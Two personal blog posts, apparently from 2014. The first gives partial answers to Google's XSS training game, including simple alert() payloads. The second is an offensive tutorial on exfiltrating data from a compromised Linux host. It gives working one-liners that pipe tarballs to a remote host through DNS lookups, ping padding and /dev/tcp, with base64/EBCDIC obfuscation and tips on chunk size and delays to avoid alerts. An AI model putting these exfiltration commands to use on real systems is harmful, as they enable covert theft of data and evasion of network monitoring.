Friday, May 30, 2014

Google xss game answers

Ok so earlier today I stopped by Googles new xss game to check it out and ill just say, it was fun and a good refresher on xss.  I might do a real writeup and explain each xss in detail in another blog post but I figured id just post the answers for now while im on a lunch break at work.


DO NOT CHEAT YOURSELF OUT OF LEARNING - The answers will need to be highlighted to view, I don't want to spoil the fun for everyone.

Resources to learn about XSS:

Below you will find my answers to the six challenges on their site.

Challenge 1:

In the search form enter:

Challenge 2:
In your comment enter:
<img src=wizbang onerror='alert(0)' /> 

Challenge 3:
 in the url bar enter:
' /><script>alert(0);</script>

Challenge 4:
In the timer form enter:

Challenge 5:
This one is pretty neat, on the second page (signup) you need to get the next parameter to run your javascript.  To do this just enter:

Challenge 6:
This one is really cool because you need to load the javascript from a resource on a webpage or some other way.  To complete the final challange I entered:
Hopefully ill do a formal writeup and really explain why all of the answers work and maybe show some alternative ways to complete the challenges.

Thursday, February 27, 2014

Data exfiltration on Linux

Been a while since my last blog post so I thought id throw up a quickie that everyone will enjoy.

Data exfiltration is really neat and there are many ways to do it, especially on linux.  I will only cover a few to make this a real short post.
Ill be using tarballs for data compression because thats the only way to do it.... not really, I just like using tarballs.

So you owned a box, or a few boxes on a network and now you want to get some of the loot off or move the data to a central location to then exfiltrate all it.  How are you going to do it?  Well here are a few techniques for linux.

Exfiltrate a tarball via DNS:
Data exfiltration via DNS on linux: tar zcf - <file(s)> | xxd -p | while read line; do host $line.<target> <remotehost>; done
now this command creates the tarball and then we read it line by line and send it to our remote host using DNS requests.  Just using this alone will probably set off some alarms when dns requests start spewing out of the box off to your server.

So to make it less suspicious and prevent us being blocked with large hostnames so we can use  -c in the xxd command to specify the number of bytes we will send each time.

Data exfiltration via DNS on linux: tar zcf - <file(s)> | xxd -p -c 8 | while read line; do host $line.<target> <remotehost>; done
This sends the tarball converted to hex 8 bytes at a time.  Also adding a simple sleep statement can spread out the DNS requests over a period of time and prevent alerts because of blasting DNS requests out.

Using PING:
Using ping is pretty much the same command as using DNS except the data is sent via ICMP requests. Here is what the commnd looks like.

tar zcf - <file> | xxd -p -c 16 | while read line; do ping -p $line -c 1 <remotehost>; done
This sends each ICMP packet only once and keeps them small only 16bytes of data per packet, you can change this as needed, some network security devices look at ICMP packet sizes to prevent this kind of exfiltration.

 Just sending the tarball over the network:

tar zcf - <file(s)> > /dev/tcp/<remotehost>443
This will send the tarball unobfuscated over the network on port 443.

But what if we want to obfuscate it?

Simple, we can add a base64 to the tarball or to ebcdic or ibm(ebcdic alternative)
 tar zcf - <file(s)> | base 64 > /dev/tcp/<remotehost>443
Or combine base64 and ebcdic/ibm
tar zcf - <file(s)> | base64 | dd conv=ebcdic > /dev/tcp/<remotehost>443
tar zcf - <file(s)> | base64 | dd conv=ibm > /dev/tcp/<remotehost>443 

So thats it for this quick post, keep in mind there are many ways to exfiltrate data. I showed you how to do it without SSH or CURL. Using ssh and curl to exfiltrate data is easy and ill leave it to you all to look into it.

(Windows data exfiltration may be coming soon... who knows)